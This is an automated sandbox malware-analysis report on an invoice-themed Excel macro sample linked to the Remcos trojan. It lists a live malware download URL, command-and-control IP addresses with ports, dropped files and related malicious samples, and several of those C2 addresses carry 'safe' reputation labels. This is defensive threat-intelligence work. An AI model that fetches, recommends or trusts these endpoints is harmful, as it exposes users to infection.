  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
INV8073565781-20210111319595.xlsm44%VirustotalBrowse
INV8073565781-20210111319595.xlsm8%MetadefenderBrowse
INV8073565781-20210111319595.xlsm32%ReversingLabsScript-Macro.Trojan.Remcos

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\k04qkvqu[1].zip100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\cjrumqtd.dll100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
wexfashion.com0%VirustotalBrowse
cdn.digicertcdn.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://5.100.228.233:3389/0%Avira URL Cloudsafe
https://80.86.91.27:3308/rt0%Avira URL Cloudsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://80.86.91.27/0%Avira URL Cloudsafe
https://80.86.91.27/xw10%Avira URL Cloudsafe
http://www.pub.0%Avira URL Cloudsafe
http://wexfashion.com/k04qkvqu.zip100%Avira URL Cloudmalware
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://80.86.91.27:3308/H0%Avira URL Cloudsafe
https://46.105.131.65:1512/0%Avira URL Cloudsafe
https://46.105.131.65/0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
https://80.86.91.27:3308/0%Avira URL Cloudsafe
https://77.220.64.37/20%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
https://77.220.64.37/50%Avira URL Cloudsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://5.100.228.233/0%Avira URL Cloudsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
wexfashion.com
198.54.125.162
truefalseunknown
cdn.digicertcdn.com
104.18.11.39
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://wexfashion.com/k04qkvqu.ziptrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.windows.com/pctv.DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpfalse
    high
    https://5.100.228.233:3389/regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://investor.msn.comDWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpfalse
      high
      http://www.msnbc.com/news/ticker.txtDWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpfalse
        high
        https://80.86.91.27:3308/rtregsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmpfalse
          high
          http://ocsp.entrust.net03regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2225536429.0000000000146000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          https://80.86.91.27/regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://80.86.91.27/xw1regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.pub.regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226464574.0000000002A20000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226464574.0000000002A20000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=trueDWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oeDWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpfalse
            high
            https://80.86.91.27:3308/Hregsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://46.105.131.65:1512/regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://46.105.131.65/regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckDWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmpfalse
              high
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226574069.0000000002A8B000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.icra.org/vocabulary/.DWWIN.EXE, 00000006.00000002.2230133054.0000000003757000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.2376776287.00000000023B0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230525771.0000000003D10000.00000002.00000001.sdmpfalse
                high
                https://80.86.91.27:3308/regsvr32.exe, 00000004.00000002.2381243212.00000000031D0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://investor.msn.com/DWWIN.EXE, 00000006.00000002.2229851737.0000000003570000.00000002.00000001.sdmpfalse
                  high
                  https://77.220.64.37/2regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.%s.comPAregsvr32.exe, 00000004.00000002.2376776287.00000000023B0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2230525771.0000000003D10000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  low
                  https://77.220.64.37/5regsvr32.exe, 00000004.00000002.2374361228.00000000002A2000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpfalse
                    high
                    https://5.100.228.233/regsvr32.exe, 00000004.00000002.2374389957.00000000002E9000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2374448037.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2374547806.00000000008C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000006.00000002.2226127205.0000000002410000.00000002.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000003.2104180455.00000000002E9000.00000004.00000001.sdmp, DWWIN.EXE, 00000006.00000003.2225165540.000000000019A000.00000004.00000001.sdmpfalse
                      high

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      5.100.228.233
                      unknownNetherlands
                      8315SENTIANLtrue
                      80.86.91.27
                      unknownGermany
                      8972GD-EMEA-DC-SXB1DEtrue
                      46.105.131.65
                      unknownFrance
                      16276OVHFRtrue
                      198.54.125.162
                      unknownUnited States
                      22612NAMECHEAP-NETUSfalse
                      77.220.64.37
                      unknownItaly
                      44160INTERNETONEInternetServicesProviderITtrue

                      General Information

                      Joe Sandbox Version:31.0.0 Red Diamond
                      Analysis ID:338240
                      Start date:11.01.2021
                      Start time:20:46:41
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 48s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:INV8073565781-20210111319595.xlsm
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.expl.evad.winXLSM@9/21@1/5
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 1.6% (good quality ratio 1.4%)
                      • Quality average: 75.1%
                      • Quality standard deviation: 36.8%
                      HCA Information:
                      • Successful, ratio: 71%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .xlsm
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      • Close Viewer
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 2.20.142.209, 2.20.142.210, 205.185.216.10, 205.185.216.42, 13.64.90.137, 104.18.11.39
                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, watson.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, blobcollector.events.data.trafficmanager.net, cacerts.digicert.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      20:47:46API Interceptor1069x Sleep call for process: regsvr32.exe modified
                      20:48:01API Interceptor519x Sleep call for process: DWWIN.EXE modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      5.100.228.233HkNkyKl3uT.dllGet hashmaliciousBrowse
                        ceepq536n.zip.dllGet hashmaliciousBrowse
                          sample20210111-01.xlsmGet hashmaliciousBrowse
                            INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                              hiytvys.dllGet hashmaliciousBrowse
                                l7rgi3xyd.dllGet hashmaliciousBrowse
                                  ymuyks.dllGet hashmaliciousBrowse
                                    INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                      hy9x6wzip.dllGet hashmaliciousBrowse
                                        INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                          jufk0vrar.dllGet hashmaliciousBrowse
                                            80.86.91.27HkNkyKl3uT.dllGet hashmaliciousBrowse
                                              ceepq536n.zip.dllGet hashmaliciousBrowse
                                                sample20210111-01.xlsmGet hashmaliciousBrowse
                                                  INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                    hiytvys.dllGet hashmaliciousBrowse
                                                      l7rgi3xyd.dllGet hashmaliciousBrowse
                                                        ymuyks.dllGet hashmaliciousBrowse
                                                          INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                            hy9x6wzip.dllGet hashmaliciousBrowse
                                                              INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                jufk0vrar.dllGet hashmaliciousBrowse
                                                                  46.105.131.65HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                    ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                      sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                        INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                          hiytvys.dllGet hashmaliciousBrowse
                                                                            l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                              ymuyks.dllGet hashmaliciousBrowse
                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                  hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                    INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                      jufk0vrar.dllGet hashmaliciousBrowse
                                                                                        77.220.64.37HkNkyKl3uT.dllGet hashmaliciousBrowse
                                                                                          ceepq536n.zip.dllGet hashmaliciousBrowse
                                                                                            sample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                              INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                hiytvys.dllGet hashmaliciousBrowse
                                                                                                  l7rgi3xyd.dllGet hashmaliciousBrowse
                                                                                                    ymuyks.dllGet hashmaliciousBrowse
                                                                                                      INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                        hy9x6wzip.dllGet hashmaliciousBrowse
                                                                                                          INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                            jufk0vrar.dllGet hashmaliciousBrowse
                                                                                                              SecuriteInfo.com.Trojan.Dridex.735.5073.dllGet hashmaliciousBrowse
                                                                                                                1 Total New Invoices-Monday December 14 2020.xlsGet hashmaliciousBrowse
                                                                                                                  1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                    1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                      1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                        1-Total New Invoices Monday Dec 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                          1 Total New Invoices-Monday December 14 2020.xlsmGet hashmaliciousBrowse
                                                                                                                            SecuriteInfo.com.Mal.EncPk-APV.3900.dllGet hashmaliciousBrowse
                                                                                                                              ygyq4p539.rar.dllGet hashmaliciousBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                cdn.digicertcdn.comsample20210111-01.xlsmGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                                                                • 104.18.11.39
                                                                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                SurfsharkSetup.exeGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                ASHLEY NAIDOO CV.docGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                RFQ.docGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                SecuriteInfo.com.Trojan.BtcMine.3311.17146.exeGet hashmaliciousBrowse
                                                                                                                                • 104.18.11.39
                                                                                                                                http://test.kunmiskincare.com/index.phpGet hashmaliciousBrowse
                                                                                                                                • 104.18.11.39
                                                                                                                                https://email.utest.com/ls/click?upn=Q3qQnfemZbaKqqMTD32WX0Q-2F38lqT2tAzE5eVnmPd7-2BQtbqdrAGPxGIiQmtbZbEcQfp88ilOu42BqywW-2BHQ-2F36ib8mcb8EYG4w64Icmefi3xXbpzwMP3NQ3974KeR1Cm-2FtwcR7xFilzHs6N8iNLyS48aGcVYmSpzSB5rZFj7iHuxTwLnTumc1AOR4vtcYHqqiqHY7g-2B-2FJ-2Bp2X-2FMfZ-2FQF6-2BtQvwrHR4Do9NZhu9Dvij-2BKa330W7UbuEz2iIv6oZ18C14g_HT-2FwmlBF7R5nW6HayR9wjpSE-2FEYoNhBRZJxfk0aqS7vYxNZiuzaetMNdYjE6WQ7lhnX-2F3CEUYMAVCWb9b2KoxJgG7bbDpZV8jJzJcz-2FHdj603HdwbUFnR5bNfB4iXdW0ho4xmgP3jr4yW0dQVZ-2FVH-2B4BUSDEwiU9rMA5oZN54vSw8okk6D-2FopaYrwFKHesb3rZ-2B-2FXvvZXiTmiwexXLF98nxPgg28hqPBVP8Ce82XUi0-3DGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                https://email.utest.com/ls/click?upn=eSGWhpVX2YfcJc4oKRJyCitYauf8dzcbVvAmQmQH4oZBbVMlkneKSVGqyJywGhpngTJJbZcqKw2ZrPBb6oQsQjUFyq4tbqbTGCzxR1eG4Z9O9abaPDZxc5NM1HvYjLOzed8zOYLIYcXnFBAxNAMQRlQBs6-2FmRK-2BaDDT2yagiQtTusU0-2FuKBxVVMBtDF3y-2BvaUDK48BxfAjoAvSGh6p8tJcMdNHuC687sMnINVJLdmfU-3D7Y6S_CzF3IAhuvYaPWoKJ87ALtJgaMHByYMlBwvQVuZ3bhcFe4St6cx8KCfN-2B2rcCNvOA-2BeX4QMjQb-2FUgtEcK8j5R6EI1G-2BBWI35h9mDCE7AAF1w3V3wR14L28vyaTqJbw5uQyTI0DJse16q7T2cnyVezsqen7-2F42lXjAhKUL9SqUvgoogoRMVuUrByVc8HvS0sQEQjAPQ8xNbeD4KhQ-2BMcqRFg-3D-3DGet hashmaliciousBrowse
                                                                                                                                • 104.18.11.39
                                                                                                                                https://email.utest.com/ls/click?upn=7pk4n7zyu3C81Mn1P-2FDmbQYiftB7Um69feDieyAcP67WG6G79-2FZJVKAlazUBAbfEF4GoDtXgPjNLWzDCnPh7Xakgzgk-2FmStvhSscVXayLFhZIIFZIYIscDWC3Iu-2BcY3A9omatVYEiWPK2Incpc6HzU578AM2hu6p-2Bn6uq0TcLQpocWZwdV9dCrqsMtrX-2FDi4HBg4XX4-2F3i2UkQ7nuJQrSo1-2FKKJZxdiMIvGfSPtt6AA-3D_Ps1_JjL7p1lgTUYZ5WQny2C5NjuXSDa0fPfjvfUw5EqzhcRvTxd-2F1XX8gbl7GK9SIE-2F651Ar7eNStX9JwifbMd-2Bpf6jPpjrN2U1igLfktYyJIQ-2Bml-2FEPkADqSRw-2Fi6D-2BnALXT-2B-2FvcMCA95hRIW-2FohWo93WXHSr3sm64NMmNmn7vCUVlwAUUBcpBMBuo-2FwDzI6vV-2FqVihNDaxiv67q2KreHoN-2B1iBGj-2FxyhjkJJWZIE1Jjos-3DGet hashmaliciousBrowse
                                                                                                                                • 104.18.11.39
                                                                                                                                https://email.utest.com/ls/click?upn=67aRGAcCFCvHxiPAckWKkhPC4KvHs6b-2F2weO-2F4bbSuzsR0S00yjD-2Bp98nxI8VUxFO-2BA-2FaoV7I7ejt7iWFdzNGQD7Rt-2B-2FrHigS8odmZ5jtBR1Jc-2F-2ByB20l8hXLQVEUsoKYNzQVntp2VlCibfgJJsmyTb3rVDsu9ejaUs6-2FrCmWTartaVeLsn0D92Hp7N17yWd7UqmLdwaGYREjE6axvHGamR7YgBj26o7dhrUoK-2BeTg4-3DlR5U_V3NU-2FA-2F-2BMCS01eqTEl7SwdC4Y1sHc0Ok-2BE-2BBcFuZa-2FMLGwVAklUo5zpn5w-2FWMCIp5-2FtPYdDyjonZQp2-2Fm-2FtoJqNBof8e11z4gErP9ujPflSfLTzXPNoDO4w6SdWItChamjCgpNcPi7T73NCj5Bg6ZnTadUi7N8-2BY2rrmnE5gpze1qYGwtCTwrD-2FEhq3HOVVSI6EgHrfbUqiGU0pY5jHFIJ3IDNrcPLgrZyFiYcyqRek-3DGet hashmaliciousBrowse
                                                                                                                                • 104.18.11.39
                                                                                                                                https://email.utest.com/ls/click?upn=LMh8OQWOikhQ4E8y-2BrYnz-2BbDB2TElaf90yCHoFAn4M1bYurbyYcloHeQnYwY0vQ7VDotXE-2F1AU3v6KKQKAvhhYV0UBWlqtuRNZJVtvX80VxChFCc1lzvSHIOg2vQaiTyT0IDnohwmvAyk6q7Lw7aV2oNzPp1SRnlWHFXN0qSB1ZgfLjV0g7BwyUNgRacGzLQzxxo4OCEX0IynXTekIdGpsnVH8RdeHbQN5hmkvqmAfMoOPsGKIXFuD2XjXmSQNwHQ8tj_OFYFW3aawQjHnZ2oUsm9aGRmiVDxWOGUeXvmswsU9xvx6eL-2F-2Facl5TxDb-2FnQAE-2F9WO-2BX1bZLZ3dQ6WwuATmPzz3S8NpXbPAjepyz5kRHvZa0CDmTSp0IhGs72hXqIXDMOuT72gd5GYA2W6rPcohuTqV3rAs0ui6xQJlDhswQEvrgqzCELYcSf4yeLy0GlPUnnpdaGlBorHCk0eM6B-2FWcFUAXo2t3fTe0C5AFZKARfK8-3DGet hashmaliciousBrowse
                                                                                                                                • 104.18.11.39
                                                                                                                                https://email.utest.com/ls/click?upn=pRtNAE4pBw306smbkBG7VfeIwBX2zq-2BxFGkc-2FYVg2kyteQhPgCyjFlF3g7Xm8OdsEJm4m-2Bb8v32fZo5G1S6IScPtZRx0O1qeslKL30HVUgu03CpTlmUlGG19oYXIdBdB3T-2BnneFUo-2FnuydTFtQrV-2FFD7ECFZ6-2BXjQduZf9kDgVI74LqkaeF5jfEKlvI9dNzmUWbncaLWs9jkPrQYRliwgvYISGRxPJ7a3gAUWZPRjDY-3DfCad_fQ8VNONEToroRqvq8M8IT71VVsbp-2FrVCPzMBywYUGjNEx5hFeS-2B3-2B0wfsC8rR2-2FcrAujDEHG74A-2FnVGsRRFxg-2FNYq0Ficj-2F6MNmWD3eD9hLtWuST0s8y4JgrbMq35uIiVx4-2FWXoquNFvepEkXYb-2BIIifvG1Hrrso0Hz938T8Kk2oqOiB-2BWIt73FfY6-2F7kAdcZlD9fseESOxt2IDwNJfsG-2BJ2dV9l2zjNB8qRR8WVLPs-3DGet hashmaliciousBrowse
                                                                                                                                • 104.18.11.39
                                                                                                                                https://email.utest.com/ls/click?upn=fuaIpvnsuSQILWwzYiXi5qnEApdA08gndIGt9eDXEUzb2D9ZQis83XJjquyQ-2B9NU6N6PUmNiYKL2-2B9K-2B0Q-2FRuNZV2Rm6EE3tP6uveKZcpGa39fA3R6q6mtnf0YazerOr3Wym2I-2B4EKphohsG9TZrR10vb4sAorg3TlmbMLBvyRhlhPfnKFPOumxhPEnjlTpz4URurYF2wvhUTU5FbrZwbgaLDFhKWhDuDmKVQ4MiqOgEAGo1wQlNp439PzN1eKX8UvDM_oB8tJkdbn8-2B0HmsO8J4iQplzftnfE-2B8k0a9q1EntRKkJu1B-2FCVgO526eX33TRFpJwAzeZS5KAS0tKKzRRvWnodl78aEsHhSxo91ApNyL4MdpCkbZLJkdQb12aN6YOUgsp7GPBut2ZGkQb0VPeuTR9sLawADBZxxcvvOm5C44mioeJoHe0qFQpD7j-2FkTjaJgMi4jWdYXYz6hdODOLE13y3HyL2fGbEXG3mHtm20h7Ry8-3DGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3DGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3DGet hashmaliciousBrowse
                                                                                                                                • 104.18.10.39
                                                                                                                                Vessel details.docGet hashmaliciousBrowse
                                                                                                                                • 104.18.11.39

                                                                                                                                ASN

